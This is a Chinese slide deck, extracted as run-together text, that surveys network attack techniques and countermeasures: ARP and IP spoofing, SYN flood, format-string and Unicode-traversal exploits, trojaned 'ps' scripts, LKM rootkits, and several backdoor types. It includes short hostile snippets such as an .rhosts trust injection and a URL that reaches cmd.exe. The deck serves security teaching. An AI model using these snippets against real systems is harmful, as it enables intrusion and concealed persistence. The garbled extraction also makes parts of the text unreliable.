网络攻击手段与防护

《网络攻击手段与防护》由会员分享，可在线阅读，更多相关《网络攻击手段与防护（91页珍藏版）》请在金锄头文库上搜索。

1、网络入侵攻击与防守常见黑客手法剖析艾奇伟总 论 入侵目的分类 入侵行为分类 回顾TCP/IP协议以及各协议层的攻击原理 入侵的一般步骤 入侵的实例 防守的要诀 附录入 侵 目 的 分 类破坏型破坏型渗透型渗透型跳板型跳板型按按目的分类目的分类修改发布信息修改发布信息摧毁核心数据摧毁核心数据 中断网络服务中断网络服务跳转攻击目标跳转攻击目标 隐藏黑客行踪隐藏黑客行踪毁灭日志数据毁灭日志数据窃取重要数据窃取重要数据盗用网络资源盗用网络资源骗取信任资源骗取信任资源按攻击方法分类按攻击方法分类远程获得权限攻击远程获得权限攻击本地超越权限攻击本地超越权限攻击拒绝服务攻击拒绝服务攻击远程获得最高权限远程获

2、得最高权限远程获得普通访问权远程获得普通访问权DOSDOS DDOSDDOS程序设计缺陷程序设计缺陷本地权限非正常提升本地权限非正常提升入 侵 行 为 分 类特 权 升 级 密码脆弱点 本地缓冲区溢出 符号链接 文件描叙字攻击 竞争状态 CORE文件攻击 共享函数库攻击 系统误配置 Shell攻击安 全 的 脆 弱 点LANLANDMZ服务器拨号服务器拨号移动用户工作站内部路由器边界路由器防火墙工作站2. 配置不当的防火墙 和内部路由器拨号服务器拨号移动用户内部路由器边界路由器防火墙1. 没有配置或者配置 不当的路由器访问控 制 3. 没有安全措施 的移动用户和拨 号访问服务器 DMZ服务器防

3、火墙4. 服务器信息 的泄露5. 运行不必要 的服务6. 配置不当的 DMZ服务器7. 在主机和网络级 缺乏认证，审计，记 帐，入侵检测能力LANLAN工作站内部路由器8. 脆弱的工作 站9. 内部网络大 量脆弱的访问资 源控制10. 缺乏有效执 行的管理策略11.过时的，脆 弱的，遗留在缺 省状态的软件12.具有过度特 权的用户帐号13.过度的信任 关系14. 不规范的布 线标准工作站回顾TCP/IP协议以及各协议层的 攻击原理 TCP/IP协议回顾 物理安全性问题 ARP欺骗技术 IP欺骗技术 ICMP木马技术 SYN FLOOD技术TCP/IP协议回顾 TCP/IP的分层 IP协议 TC

4、P协议 UDP协议 TCP与UDP的比较 ARP与RARP ICMP及Tranceroute 服务与端口号 其他协议TCP/IP的分层用户 进程TCPUDPICMPIPIGMPARP硬件接口RARP用户 进程用户 进程用户 进程应用层传输层网络层链路层IP协议 所有的TCP、UDP、ICMP以及IGMP数据 都以IP数据报形式传输 IP数据报具有不可靠（unreliable）和无连 接（connectionless）两个特性 TCP协议三三 次次 握握 手手服务器客户端UDP协议 UDP是一个简单的面向数据报的传输层协 议 UDP数据报文封装在IP数据报中进行传输 ，是IP数据报文数据段的一部

5、分 TCP与UDP的比较使用IP 作为其 网络层 协议高度可靠高度可用 不可靠简单而高效 UDPUDPTCPTCPARP与RARPSend to 3.3.3.3gatewayABC?Who is 3.3.3.3?Who is 3.3.3.3?Who is 3.3.3.3?I am!（return Mac）IP地址Mac地址C3.3.3.30:0:2d:3f:c0:60ARP表ICMP协议网关 ping ICMP查询报文Ping 1.1.1.1ICMP查询报文ICMP差错报文ICMP差错报文Couldnt find 1.1.1.1internetTraceroute Traceroute原理：

6、通过发送TTL值依次为1，2。的IP数 据包给目的主机，路由器会将TTL减一， 如果TTL0路由器就返回ICMP超时报文 ，报文里就有该路由器的ip地址。依次类 推，最后发送UDP协议给目的主机，通过 返回的ICMP报文是端口不可达报文还是 超时报文来判断是否达到真正的主机。服务与端口号123.21.23.80.1023。65535123.65535FTPTelentHTTP随机端口随机端口随机端口保 留 端 口 其它端口 其他协议 DNS（域名解析协议 ） SMTP与POP3协议 Telnet协议 FTP(文件传输协议) HTTP协议物理层的安全问题 安全需求 电磁辐射-电磁屏蔽器 防链路的

7、高压电攻击-物理隔离卡ARP欺骗技术 ARP缓存表 基于HUB的欺骗 基于交换机的欺骗ARP缓存表HUBABCPingARP缓存表A的地址为：IP：192.168.10.1 MAC: AA-AA-AA-AA-AA-AA B的地址为：IP：192.168.10.2 MAC: BB-BB-BB-BB-BB-BB C的地址为：IP：192.168.10.3 MAC: CC-CC-CC-CC-CC-CC A的机器： C:arp -aInterface: 192.168.10.1 on Interface 0x1000003 Internet Address Physical Address Type

8、192.168.10.3 CC-CC-CC-CC-CC-CC dynamic基于HUB的欺骗HUBABC发送一个arp应答包，MAC地址 为DD-DD-DD-DD-DD-DD基于HUB的欺骗 A的缓存表变为：C:arp -aInterface: 192.168.10.1 on Interface 0x1000003 Internet Address Physical Address Type 192.168.10.3 DD-DD-DD-DD-DD-DD dynamic 于是这时候A再次PING C的时候，就 PING不通了！基于HUB的欺骗 B需要作为一个man in middle的作用，转

9、发A发往C的数据包，达到嗅探的目的基于交换机的欺骗和欺骗HUB一个道理，破坏交换机的PORT和MAC的对应表 对策： 防火墙和边界路由器上设置静态ARP。上例中如果在B中设置A的静 态ARP，如下命令 ARP s 192.168.0.1 00-FF-3C-5F-6D-2B ARP a Interface: 0.0.0.0 on Interface 0x1000003 Internet Address Physical Address Type 192.168.0.1 00-01-03-85-37-b6 static用ARPwatch这样的软件来监视网络中IP与ARP之间对应的变化 IP欺骗技术

10、 信任关系理论 IP欺骗理论依据：三次握手 IP欺骗攻击过程解析IP欺骗攻击过程解析 使被信任主机失去工作能力 序例号取样和猜测 echo + /.rhostsICMP木马技术 现有木马的脆弱性 PING程序的启发 利用SOCK_RAW定制自己的ICMP报文， 用来传输控制命令和回显信息SYN FLOOD技术 半开的连接 操作系统的syn连接的timeout时间 大量的syn连接消耗cpu系统时间SYN FLOOD技术SYN ACK/SYNACK 正常三次握手大量半开放连接SYN FLOOD的防范 Syn cookie技术 给每一个请求连接的IP地址分配一个 Cookie，如果短时间内连续受到

11、某个IP的 重复SYN报文，就认定是受到了攻击，以 后从这个IP地址来的包会被一概丢弃。 随机丢包踩点攻击扫描清除日志隐藏 strcpy(buffer,str); 格式化字符串参数个数不固定造成访问越界数据int main(void)int i=1,j=2,k=3;char buf=“test“;printf(“%s %d %d %dn“,buf,i,j,k);（printf(“%s %d %d %dn“,buf,i,j);）return 0;格式化字符串利用%n格式符写入跳转地址int main(void)int num;int i=1,j=2,k=3;printf(“%d%d%d%nn“,

12、i,j,k,printf(“%dn“,num);return 0;输入验证问题 http:/ %c1%1c/winnt/system32/cmd.exe?/c+ dir 利用Unicode编码后越过%wwwroot%目录 保护机制Unicode漏洞解析脚本入侵实例sql=“select * from user where username=“print ctrl+dPS1、mv ps psbak 2、cat ps #!/bin/sh psbak $1|grep -v sniff|grep -v grep|grep -v psbak|gawk gsub(/sh /bin/, “,$0);prin

13、t ctrl+d3、chmod 755 psLKM LKM System Call （用户级到内核级的转换） 保存sys_call_table的入口LKM可以做的事情 隐藏文件 隐藏进程 隐藏网络连接 重定向可执行文件 隐藏sniff 和LKM通信 隐藏LKM本身 隐藏符号表LKM后门应用 knark adore反LKM后门 SaintMichael LKM Anti LKM backdoor Monitoring system call table第七步 后门 Login BackdoorLogin Backdoor BindshellBindshell CgiCgi Backdoor Ba

14、ckdoor Ping BackdoorPing Backdoor ACK BackdoorACK Backdoor Database backdoorDatabase backdoor sshssh认证密钥认证密钥 .forward.forward Apache backdoorApache backdoorLogin Backdoor/bin/login PAM认证模块Term=hacker?否调用pam模块要求用户 提供登录的标识和口令shell是CGI Backdoor PHP,PERL system($execthis); ASP Call oScript.Run (“cmd.exe

15、 /c “ while (size != SIZEPACK + 28); . bind_shell(); exit(0); . Ping backdoor(2)木桶理论 风险不是独立存在的 攻击有蔓延性 单一的产品不能保护系统的安全木桶理论防守的要诀 踩点重新配置服务器，最大限度减 少敏 感信息泄露 扫描使用IDS，防火墙等等 攻击操作系统的配置，应用程序的 配置， 网络结构的配置等等 后门检查确定攻击损失，手动审核 ，重 装系统结 论攻击和防 守永远是 此消彼长 的一个动 态过程附录 安全资源 Http:/www.cert.org http:/www.sans.org http:/ http:/www.i